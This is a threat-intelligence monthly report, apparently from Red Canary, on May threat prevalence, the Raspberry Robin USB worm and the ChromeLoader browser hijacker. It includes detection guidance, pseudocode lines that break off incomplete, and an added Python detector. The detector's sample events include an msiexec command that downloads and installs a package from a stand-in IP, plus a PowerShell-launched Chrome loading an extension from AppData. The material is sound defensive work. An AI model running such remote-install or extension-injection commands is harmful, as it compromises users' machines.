⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Observations on trending threats
Overall threat volume increased slightly in May, with 13.3 percent of Red Canary customers encountering at least one named threat (up from 12.7% in April, but still below March’s 14.3% mark). Despite some typical shuffling, the prevalent threats this month were all within a few spots of last month’s top 10. Notably, after diving a little deeper into the differences between Gootkit and Gootloader, we’ve started to distinguish the more commonly observed Gootloader activity from the less common Gootkit payload. We previously tracked all of this activity under Gootkit, and the historical numbers for Gootloader referenced above reflect both Gootloader and Gootkit activity.
Blog posts published this month
In May, Red Canary published research on two threats: Raspberry Robin and ChromeLoader. In case you missed them, we’ve provided summaries here as well as links to the full articles.
Raspberry Robin is Red Canary’s name for a cluster of USB worm activity that we’ve been tracking since September 2021. If that name sounds familiar, it might be because we’ve shared information about Raspberry Robin with you in previous Intelligence Insights as it climbed the charts. In early May, we also published a blog on Raspberry Robin with our research on this threat.
Raspberry Robin appears to spread via infected USB drives. When the infected drive is plugged into a system, a shortcut (LNK file) masquerading as a legitimate folder is executed. In its first phase of activity, Raspberry Robin uses msiexec.exe to reach out to a malicious IP address for command and control (C2) communication.
Detection opportunity: msiexec.exe downloading and executing packages
To detect suspicious use of msiexec.exe by Raspberry Robin or other threats, it’s essential to take a look at the command line and the URL. Detecting msiexec.exe making outbound network connections to download and install packages in the command line interface will give you the opportunity to examine the activity and determine if it’s malicious or not.
process == (
process_command_line_includes == (
process_command_line_includes == (
Over the past few weeks, we’ve heard from a number of security professionals who have spotted Raspberry Robin in their environments. We continue to monitor, track, and research Raspberry Robin activity and incorporate new information as necessary.
ChromeLoader is a pervasive and persistent browser hijacker that modifies its victims’ browser settings and redirects user traffic to advertisement websites. This malware is introduced via an ISO file that baits users into executing it by posing as a cracked video game or pirated movie or TV show. It eventually manifests as a browser extension.
Like most suspicious browser extensions, ChromeLoader is a relatively benign threat that hijacks user search queries and redirects traffic to an advertising site. However, ChromeLoader uses PowerShell to inject itself into the browser and add a malicious extension to it, a technique we don’t see very often (and one that often goes undetected by other security tools). If applied to a higher-impact threat—such as a credential harvester or spyware—this PowerShell behavior could help malware gain an initial foothold and go undetected before performing more overtly malicious activity, like exfiltrating data from a user’s browser session.
Detection opportunity: PowerShell spawning Chrome with AppData\Local within the command line
The detection analytic looks for instances of the Chrome browser executable spawning from PowerShell with a corresponding command line that includes appdata\local as a parameter.
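Both detection opportunities in this post (msiexec.exe with a URL in its command line, and PowerShell spawning Chrome with appdata\local in the command line) expressed as matching logic run over constructed process events. This is an added example, not Red Canary's analytic or code; the event field names, the sample events and the inclusion of pwsh.exe alongside powershell.exe are assumptions.

```python
import ntpath
import re

# Constructed sample process events (not real telemetry). Fields mirror the three
# attributes the analytics above key on: the process, its parent and the command line.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "process": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\tool.msi" /qn'},   # local MSI
    {"id": 2, "parent": r"C:\Windows\System32\cmd.exe",
     "process": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /q /i http://203.0.113.10:8080/pkg.msi"},            # remote MSI
    {"id": 3, "parent": r"C:\Windows\explorer.exe",
     "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},   # normal launch
    {"id": 4, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'chrome.exe --load-extension="C:\Users\alice\AppData\Local\Temp\ext"'},
    {"id": 5, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "process": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
POWERSHELL_NAMES = {"powershell.exe", "pwsh.exe"}  # pwsh.exe is an assumption

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so matching ignores directory and case."""
    return ntpath.basename(path).lower()

def msiexec_remote_install(ev: dict) -> bool:
    """msiexec.exe whose command line points at an http(s) URL (download-and-install)."""
    return basename(ev["process"]) == "msiexec.exe" and bool(URL_RE.search(ev["cmdline"]))

def powershell_spawns_chrome_appdata(ev: dict) -> bool:
    """chrome.exe started by PowerShell with appdata\\local somewhere in the command line."""
    return (basename(ev["parent"]) in POWERSHELL_NAMES
            and basename(ev["process"]) == "chrome.exe"
            and r"appdata\local" in ev["cmdline"].lower())

RULES = {
    "msiexec_remote_install": msiexec_remote_install,
    "powershell_spawns_chrome_appdata": powershell_spawns_chrome_appdata,
}

def run_detections(events) -> list:
    """Return (event id, rule name) pairs for every event that matches a rule."""
    return [(ev["id"], name) for ev in events for name, rule in RULES.items() if rule(ev)]

if __name__ == "__main__":
    for event_id, rule_name in run_detections(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule_name}")
```

Events 1, 3 and 5 show why each rule needs more than one condition: a local MSI install, a normal Chrome launch and PowerShell starting an unrelated process all pass without a hit.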
For more details and additional opportunities to detect this pushy malvertiser, check out our May blog post.